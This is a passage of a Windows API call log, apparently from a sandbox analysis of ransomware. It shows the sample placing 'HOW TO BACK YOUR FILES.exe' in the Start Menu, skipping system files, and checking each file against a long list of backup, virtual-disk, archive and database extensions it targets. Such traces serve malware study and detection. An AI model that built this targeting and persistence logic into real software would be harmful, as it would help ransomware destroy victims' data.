[0067.059] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.059] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.059] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc11c60a0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xc11c60a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc11c60a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xbb7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Project Server 2010 Accounts.lnk", cAlternateFileName="MIBC23~1.LNK")) returned 0 [0067.059] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0067.059] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d25a8 [0067.059] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance" [0067.059] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4cc0 | out: hHeap=0x2b0000) returned 1 [0067.059] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25a0 | out: hHeap=0x2b0000) returned 1 [0067.059] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance") returned 50 [0067.059] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance" | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance" [0067.059] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.059] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\start menu\\programs\\maintenance\\how to back your files.exe"), bFailIfExists=1) returned 0 [0067.060] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0067.060] GetLastError () returned 0x0 [0067.060] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0067.060] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0067.060] CloseHandle (hObject=0x154) returned 1 [0067.060] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0067.060] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.060] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4bba58c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bba58c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0067.060] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.060] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0067.060] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.060] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4bba58c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bba58c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.060] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.060] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0067.060] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.060] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.061] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a1030d3, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x8a1030d3, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8a1030d3, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x518, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Backup and Restore Center.lnk", cAlternateFileName="BACKUP~1.LNK")) returned 1 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2="aoldtz.exe") returned 1 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2=".") returned 1 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2="..") returned 1 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2="windows") returned -1 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2="bootmgr") returned -1 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2="temp") returned -1 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2="pagefile.sys") returned -1 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2="boot") returned -1 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2="ids.txt") returned -1 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2="ntuser.dat") returned -1 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2="perflogs") returned -1 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2="MSBuild") returned -1 [0067.061] lstrlenW (lpString="Backup and Restore Center.lnk") returned 29 [0067.061] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\*") returned 52 [0067.061] lstrcpyW (in: lpString1=0x2cce466, lpString2="Backup and Restore Center.lnk" | out: lpString1="Backup and Restore Center.lnk") returned="Backup and Restore Center.lnk" [0067.061] lstrlenW (lpString="Backup and Restore Center.lnk") returned 29 [0067.061] lstrlenW (lpString="Ares865") returned 7 [0067.061] lstrcmpiW (lpString1="ter.lnk", lpString2="Ares865") returned 1 [0067.061] lstrlenW (lpString=".dll") returned 4 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2=".dll") returned 1 [0067.061] lstrlenW (lpString=".lnk") returned 4 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2=".lnk") returned 1 [0067.061] lstrlenW (lpString=".ini") returned 4 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2=".ini") returned 1 [0067.061] lstrlenW (lpString=".sys") returned 4 [0067.061] lstrcmpiW (lpString1="Backup and Restore Center.lnk", lpString2=".sys") returned 1 [0067.061] lstrlenW (lpString="Backup and Restore Center.lnk") returned 29 [0067.061] lstrlenW (lpString="bak") returned 3 [0067.061] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0067.061] lstrlenW (lpString="ba_") returned 3 [0067.061] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0067.061] lstrlenW (lpString="dbb") returned 3 [0067.061] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0067.061] lstrlenW (lpString="vmdk") returned 4 [0067.061] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0067.062] lstrlenW (lpString="rar") returned 3 [0067.062] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0067.062] lstrlenW (lpString="zip") returned 3 [0067.062] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0067.062] lstrlenW (lpString="tgz") returned 3 [0067.062] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0067.062] lstrlenW (lpString="vbox") returned 4 [0067.062] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0067.062] lstrlenW (lpString="vdi") returned 3 [0067.062] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0067.062] lstrlenW (lpString="vhd") returned 3 [0067.062] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0067.062] lstrlenW (lpString="vhdx") returned 4 [0067.062] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0067.062] lstrlenW (lpString="avhd") returned 4 [0067.062] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0067.062] lstrlenW (lpString="db") returned 2 [0067.062] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0067.062] lstrlenW (lpString="db2") returned 3 [0067.062] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0067.062] lstrlenW (lpString="db3") returned 3 [0067.062] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0067.062] lstrlenW (lpString="dbf") returned 3 [0067.062] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0067.062] lstrlenW (lpString="mdf") returned 3 [0067.062] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0067.062] lstrlenW (lpString="mdb") returned 3 [0067.062] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0067.062] lstrlenW (lpString="sql") returned 3 [0067.062] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0067.062] lstrlenW (lpString="sqlite") returned 6 [0067.062] lstrcmpiW (lpString1="er.lnk", lpString2="sqlite") returned -1 [0067.062] lstrlenW (lpString="sqlite3") returned 7 [0067.062] lstrcmpiW (lpString1="ter.lnk", lpString2="sqlite3") returned 1 [0067.062] lstrlenW (lpString="sqlitedb") returned 8 [0067.062] lstrcmpiW (lpString1="nter.lnk", lpString2="sqlitedb") returned -1 [0067.062] lstrlenW (lpString="xml") returned 3 [0067.062] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0067.063] lstrlenW (lpString="$er") returned 3 [0067.063] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0067.063] lstrlenW (lpString="4dd") returned 3 [0067.063] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0067.063] lstrlenW (lpString="4dl") returned 3 [0067.063] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0067.063] lstrlenW (lpString="^^^") returned 3 [0067.063] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0067.063] lstrlenW (lpString="abs") returned 3 [0067.063] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0067.063] lstrlenW (lpString="abx") returned 3 [0067.063] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0067.063] lstrlenW (lpString="accdb") returned 5 [0067.063] lstrcmpiW (lpString1="r.lnk", lpString2="accdb") returned 1 [0067.063] lstrlenW (lpString="accdc") returned 5 [0067.063] lstrcmpiW (lpString1="r.lnk", lpString2="accdc") returned 1 [0067.063] lstrlenW (lpString="accde") returned 5 [0067.063] lstrcmpiW (lpString1="r.lnk", lpString2="accde") returned 1 [0067.063] lstrlenW (lpString="accdr") returned 5 [0067.063] lstrcmpiW (lpString1="r.lnk", lpString2="accdr") returned 1 [0067.063] lstrlenW (lpString="accdt") returned 5 [0067.063] lstrcmpiW (lpString1="r.lnk", lpString2="accdt") returned 1 [0067.063] lstrlenW (lpString="accdw") returned 5 [0067.063] lstrcmpiW (lpString1="r.lnk", lpString2="accdw") returned 1 [0067.063] lstrlenW (lpString="accft") returned 5 [0067.063] lstrcmpiW (lpString1="r.lnk", lpString2="accft") returned 1 [0067.063] lstrlenW (lpString="adb") returned 3 [0067.063] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.063] lstrlenW (lpString="adb") returned 3 [0067.063] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.063] lstrlenW (lpString="ade") returned 3 [0067.063] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0067.063] lstrlenW (lpString="adf") returned 3 [0067.063] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0067.063] lstrlenW (lpString="adn") returned 3 [0067.063] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0067.063] lstrlenW (lpString="adp") returned 3 [0067.063] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0067.064] lstrlenW (lpString="alf") returned 3 [0067.064] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0067.064] lstrlenW (lpString="ask") returned 3 [0067.064] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0067.064] lstrlenW (lpString="btr") returned 3 [0067.064] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0067.064] lstrlenW (lpString="cat") returned 3 [0067.064] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0067.064] lstrlenW (lpString="cdb") returned 3 [0067.064] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0067.064] lstrlenW (lpString="ckp") returned 3 [0067.064] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0067.064] lstrlenW (lpString="cma") returned 3 [0067.064] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0067.064] lstrlenW (lpString="cpd") returned 3 [0067.064] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0067.064] lstrlenW (lpString="dacpac") returned 6 [0067.064] lstrcmpiW (lpString1="er.lnk", lpString2="dacpac") returned 1 [0067.064] lstrlenW (lpString="dad") returned 3 [0067.064] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0067.064] lstrlenW (lpString="dadiagrams") returned 10 [0067.064] lstrcmpiW (lpString1="Center.lnk", lpString2="dadiagrams") returned -1 [0067.064] lstrlenW (lpString="daschema") returned 8 [0067.064] lstrcmpiW (lpString1="nter.lnk", lpString2="daschema") returned 1 [0067.064] lstrlenW (lpString="db-journal") returned 10 [0067.064] lstrcmpiW (lpString1="Center.lnk", lpString2="db-journal") returned -1 [0067.064] lstrlenW (lpString="db-shm") returned 6 [0067.064] lstrcmpiW (lpString1="er.lnk", lpString2="db-shm") returned 1 [0067.064] lstrlenW (lpString="db-wal") returned 6 [0067.064] lstrcmpiW (lpString1="er.lnk", lpString2="db-wal") returned 1 [0067.064] lstrlenW (lpString="dbc") returned 3 [0067.064] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0067.064] lstrlenW (lpString="dbs") returned 3 [0067.064] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0067.064] lstrlenW (lpString="dbt") returned 3 [0067.064] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0067.064] lstrlenW (lpString="dbv") returned 3 [0067.064] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0067.064] lstrlenW (lpString="dbx") returned 3 [0067.065] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0067.065] lstrlenW (lpString="dcb") returned 3 [0067.065] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0067.065] lstrlenW (lpString="dct") returned 3 [0067.065] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0067.065] lstrlenW (lpString="dcx") returned 3 [0067.065] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0067.065] lstrlenW (lpString="ddl") returned 3 [0067.065] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0067.065] lstrlenW (lpString="dlis") returned 4 [0067.065] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0067.065] lstrlenW (lpString="dp1") returned 3 [0067.065] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0067.065] lstrlenW (lpString="dqy") returned 3 [0067.065] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0067.065] lstrlenW (lpString="dsk") returned 3 [0067.065] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0067.065] lstrlenW (lpString="dsn") returned 3 [0067.065] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0067.065] lstrlenW (lpString="dtsx") returned 4 [0067.065] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0067.065] lstrlenW (lpString="dxl") returned 3 [0067.065] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0067.065] lstrlenW (lpString="eco") returned 3 [0067.065] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0067.065] lstrlenW (lpString="ecx") returned 3 [0067.065] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0067.065] lstrlenW (lpString="edb") returned 3 [0067.065] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0067.065] lstrlenW (lpString="epim") returned 4 [0067.065] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0067.065] lstrlenW (lpString="fcd") returned 3 [0067.065] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0067.065] lstrlenW (lpString="fdb") returned 3 [0067.065] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0067.065] lstrlenW (lpString="fic") returned 3 [0067.065] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0067.065] lstrlenW (lpString="flexolibrary") returned 12 [0067.066] lstrcmpiW (lpString1="e Center.lnk", lpString2="flexolibrary") returned -1 [0067.066] lstrlenW (lpString="fm5") returned 3 [0067.066] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0067.066] lstrlenW (lpString="fmp") returned 3 [0067.066] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0067.066] lstrlenW (lpString="fmp12") returned 5 [0067.066] lstrcmpiW (lpString1="r.lnk", lpString2="fmp12") returned 1 [0067.066] lstrlenW (lpString="fmpsl") returned 5 [0067.066] lstrcmpiW (lpString1="r.lnk", lpString2="fmpsl") returned 1 [0067.066] lstrlenW (lpString="fol") returned 3 [0067.066] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0067.066] lstrlenW (lpString="fp3") returned 3 [0067.066] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0067.066] lstrlenW (lpString="fp4") returned 3 [0067.066] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0067.066] lstrlenW (lpString="fp5") returned 3 [0067.066] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0067.066] lstrlenW (lpString="fp7") returned 3 [0067.066] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0067.066] lstrlenW (lpString="fpt") returned 3 [0067.066] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0067.066] lstrlenW (lpString="frm") returned 3 [0067.066] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0067.066] lstrlenW (lpString="gdb") returned 3 [0067.066] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0067.066] lstrlenW (lpString="gdb") returned 3 [0067.066] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0067.066] lstrlenW (lpString="grdb") returned 4 [0067.066] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0067.066] lstrlenW (lpString="gwi") returned 3 [0067.066] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0067.066] lstrlenW (lpString="hdb") returned 3 [0067.066] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0067.066] lstrlenW (lpString="his") returned 3 [0067.066] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0067.066] lstrlenW (lpString="ib") returned 2 [0067.066] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0067.066] lstrlenW (lpString="idb") returned 3 [0067.067] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0067.067] lstrlenW (lpString="ihx") returned 3 [0067.067] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0067.067] lstrlenW (lpString="itdb") returned 4 [0067.067] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0067.067] lstrlenW (lpString="itw") returned 3 [0067.067] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0067.067] lstrlenW (lpString="jet") returned 3 [0067.067] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0067.067] lstrlenW (lpString="jtx") returned 3 [0067.067] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0067.067] lstrlenW (lpString="kdb") returned 3 [0067.067] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0067.067] lstrlenW (lpString="kexi") returned 4 [0067.067] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0067.067] lstrlenW (lpString="kexic") returned 5 [0067.067] lstrcmpiW (lpString1="r.lnk", lpString2="kexic") returned 1 [0067.067] lstrlenW (lpString="kexis") returned 5 [0067.067] lstrcmpiW (lpString1="r.lnk", lpString2="kexis") returned 1 [0067.067] lstrlenW (lpString="lgc") returned 3 [0067.067] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0067.067] lstrlenW (lpString="lwx") returned 3 [0067.067] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0067.067] lstrlenW (lpString="maf") returned 3 [0067.067] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0067.067] lstrlenW (lpString="maq") returned 3 [0067.067] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0067.067] lstrlenW (lpString="mar") returned 3 [0067.067] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0067.067] lstrlenW (lpString="marshal") returned 7 [0067.067] lstrcmpiW (lpString1="ter.lnk", lpString2="marshal") returned 1 [0067.067] lstrlenW (lpString="mas") returned 3 [0067.067] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0067.067] lstrlenW (lpString="mav") returned 3 [0067.067] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0067.067] lstrlenW (lpString="maw") returned 3 [0067.067] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0067.067] lstrlenW (lpString="mdbhtml") returned 7 [0067.067] lstrcmpiW (lpString1="ter.lnk", lpString2="mdbhtml") returned 1 [0067.068] lstrlenW (lpString="mdn") returned 3 [0067.068] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0067.068] lstrlenW (lpString="mdt") returned 3 [0067.068] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0067.068] lstrlenW (lpString="mfd") returned 3 [0067.068] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0067.068] lstrlenW (lpString="mpd") returned 3 [0067.068] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0067.068] lstrlenW (lpString="mrg") returned 3 [0067.068] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0067.068] lstrlenW (lpString="mud") returned 3 [0067.068] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0067.068] lstrlenW (lpString="mwb") returned 3 [0067.068] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0067.068] lstrlenW (lpString="myd") returned 3 [0067.068] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0067.068] lstrlenW (lpString="ndf") returned 3 [0067.068] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0067.068] lstrlenW (lpString="nnt") returned 3 [0067.068] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0067.068] lstrlenW (lpString="nrmlib") returned 6 [0067.068] lstrcmpiW (lpString1="er.lnk", lpString2="nrmlib") returned -1 [0067.068] lstrlenW (lpString="ns2") returned 3 [0067.068] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0067.068] lstrlenW (lpString="ns3") returned 3 [0067.068] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0067.068] lstrlenW (lpString="ns4") returned 3 [0067.068] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0067.068] lstrlenW (lpString="nsf") returned 3 [0067.068] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0067.068] lstrlenW (lpString="nv") returned 2 [0067.068] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0067.068] lstrlenW (lpString="nv2") returned 3 [0067.068] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0067.068] lstrlenW (lpString="nwdb") returned 4 [0067.068] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0067.068] lstrlenW (lpString="nyf") returned 3 [0067.068] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0067.069] lstrlenW (lpString="odb") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0067.069] lstrlenW (lpString="odb") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0067.069] lstrlenW (lpString="oqy") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0067.069] lstrlenW (lpString="ora") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0067.069] lstrlenW (lpString="orx") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0067.069] lstrlenW (lpString="owc") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0067.069] lstrlenW (lpString="p96") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0067.069] lstrlenW (lpString="p97") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0067.069] lstrlenW (lpString="pan") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0067.069] lstrlenW (lpString="pdb") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0067.069] lstrlenW (lpString="pdm") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0067.069] lstrlenW (lpString="pnz") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0067.069] lstrlenW (lpString="qry") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0067.069] lstrlenW (lpString="qvd") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0067.069] lstrlenW (lpString="rbf") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0067.069] lstrlenW (lpString="rctd") returned 4 [0067.069] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0067.069] lstrlenW (lpString="rod") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0067.069] lstrlenW (lpString="rodx") returned 4 [0067.069] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0067.069] lstrlenW (lpString="rpd") returned 3 [0067.069] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0067.069] lstrlenW (lpString="rsd") returned 3 [0067.070] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0067.070] lstrlenW (lpString="sas7bdat") returned 8 [0067.070] lstrcmpiW (lpString1="nter.lnk", lpString2="sas7bdat") returned -1 [0067.070] lstrlenW (lpString="sbf") returned 3 [0067.070] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0067.070] lstrlenW (lpString="scx") returned 3 [0067.070] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0067.070] lstrlenW (lpString="sdb") returned 3 [0067.070] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0067.070] lstrlenW (lpString="sdc") returned 3 [0067.070] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0067.070] lstrlenW (lpString="sdf") returned 3 [0067.070] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0067.070] lstrlenW (lpString="sis") 